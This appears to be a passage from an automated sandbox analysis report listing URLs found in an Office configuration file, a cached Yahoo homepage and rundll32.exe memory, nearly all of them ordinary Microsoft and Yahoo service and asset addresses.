Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://config.edge.skype.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cortana.ai/api
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://cr.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dev.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://devnull.onenote.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://directory.services.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://graph.windows.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://graph.windows.net/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://help.yahoo.com/kb/account
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://lifecycle.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://login.windows.local
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://management.azure.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://management.azure.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://messaging.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officeapps.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://overview.mail.yahoo.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/cmp/version/3.0.3/cmp.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.SubscriptionReminder.atomic.ltr.cf0f4577b866e
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.custom.desktop.95c72e8740c6b97fbdb525937d8788
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-footer.FooterDesktop.atomic.ltr.0dabe32d96d30f44862f1509e65
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.HeaderDesktop.atomic.ltr.11873c103003ff0d3521375fdb9
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.MailPreview.atomic.ltr.1d101919d0fcd67e4832e47629894
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.custom.desktop.2ce65662738d6cd781c23fc340c7205c.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetBannerPromo.atomic.ltr.b7b5b76bb9c6987dd5d6
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetPromo.atomic.ltr.f9b4b86f21ef1f516530b45567
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.NTKDesktop.atomic.ltr.94b956089fc91c2f0a244928a927abc9.
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.custom.desktop.a69916e03ec8f658d9530295bab867ab.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamRelated.atomic.ltr.ce56954bd34343adfacf42baec3
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamWide.atomic.ltr.01431f1a963747bd42b012a4d15cd6
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.custom.desktop.35b4e59342f8c72801c502afb5933cff.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-trending.Trending.atomic.ltr.3daf50b9757f01b0beab6adecd0b22
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-dialog.UserDialogLite.atomic.ltr.875d949b676096085b14b
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.ContentPreference.atomic.ltr.bbf364e334d48eef59
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.rollupDesktop.atomic.ltr.85ffd965befa53ddf87e9a
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-header.custom.desktop.e0cc81c4de21a0aee644ee9285d79117.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-stream.custom.09abbb0c62340e97edf4c917b11628c4.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/scp/css/viewer.620320aff0540f575958990a24cd94ed.css
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/vzm/cs_1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/vzm/perf-vitals_1.3.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-account-switch-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-autocomplete-1.19.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-beacon-1.3.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-bind-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-core-1.43.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-countdown-1.2.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-darla-1.0.21.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-drawer-1.0.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-dropdown-drawer-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-fetch-1.16.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-form-1.23.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-geolocation-1.2.9.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-image-1.1.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-menu-1.0.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-rapid-1.5.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-tabs-1.10.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-text-1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-toggle-1.13.2.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/yc/js/iframe-1.0.26.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/default/20191018/EN_US_Yellow_300x250.png)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/default/icons/favicon_y19_32x32_custom.svg
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/notifications/default-notif-img.png-168x168.png
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/DailyFantasy_BN_Baseball_300x250-min.jpg)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/g/myy/fallback_grid_0.0.4.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/g/sda/sda_flex_0.0.42.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/os/yc/css/bundle.c60a6d54.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/rq/darla/4-6-0/js/g-r-min.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/rz/l/favicon.ico
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/ss/rapid-3.53.17.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/BUky.irBpy2idMZJp.EufA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/Emg04hx6q7x_kZo7E5_wgA--~B/Zmk9c3RyaW07aD0xOTM7cT05NTt3PTIyMDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/GXmFDhVbGWyZvB.4VbCU7w--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NJBDKYvT49dzIAW1aj4NFA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmpString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QotT_5MVAG9nDKsSCE8gVA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QzM21sk4Ljo_mk7ni0FtpQ--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/avZ1m08tUBiHPBtv_CLfAw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/l_eSHW.xbgQKdH8J9CAEbg--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/osujQR2mchEHVk2pUiF4hQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmpString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/wYmB0OdYXJ_idrKq3V9SYw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&c
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://search.yahoo.com/opensearch.xml
Source: 94101.png.4.drString found in binary or memory: https://sectigo.com/CPS0D
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://settings.outlook.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://staging.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://tasks.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/advertising
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/careers
